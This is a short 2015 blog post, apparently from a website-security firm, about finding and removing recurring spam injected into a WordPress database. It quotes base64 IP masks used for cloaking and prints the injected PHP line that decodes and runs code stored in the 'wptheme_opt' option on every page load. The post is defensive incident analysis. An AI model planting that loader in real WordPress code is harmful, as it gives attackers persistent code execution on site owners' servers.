Wednesday, May 27, 2015

Identifying and Removing Spam From Word Press Database

Background

This case of Spam clean-up from Word Press website didn't stand out from the first glance. Customer was blacklisted by Google due to spam posts. As a part of blacklisting removal service we reviewed Google alert and start working. Internal malware scan with Quttera tools quickly identified and verified the infection and type. However, the Spam posts kept re-appearing upon successful clean-ups. This post is a short overview of Spam removal process to give you hints when you search for Spam origin in your websites.

Malware Scan and Investigation

As no suspicious posts were there in Word Press dashboard we started to investigate MySQL database tables content. Spamming posts were found and removed from database. In no time, new posts were added with different spam content. Next thing we checked cache plugins that were installed and removed them to decrease "investigation noise". After that, we dumped content of wpoptions table and investigated its content. During investigation we found two malicious Word Press options  wpdcon and wptheme_opt

wpdcon contained suspicious IP masks encoded with base64  

NS4yNTUuMTkyLjAtMTg= 
OC4qLiouKg==
MTIuMC4qLio= 

For full body see here - http://pastebin.com/uYzXu1B3

These masks are used to recognize whether request came from human visitor 

wptheme_opt  (http://pastebin.com/cdFLyL9X ) contained actually the body that loaded spam posts into the data base.

When were removed, the missing options started to generate errors upon access to a website. Investigating those errors highlighted the exact injection place.

Following is a dump of the infection:

{{{{

add_action('init', create_function('', implode("\n", array_map("base64_decode", unserialize(get_option("wptheme_opt"))))));

}}}}

Resolution

As a part of anti-malware services for websites, the re-consideration request has been submitted and Google have removed their alert. 


No comments:

Post a Comment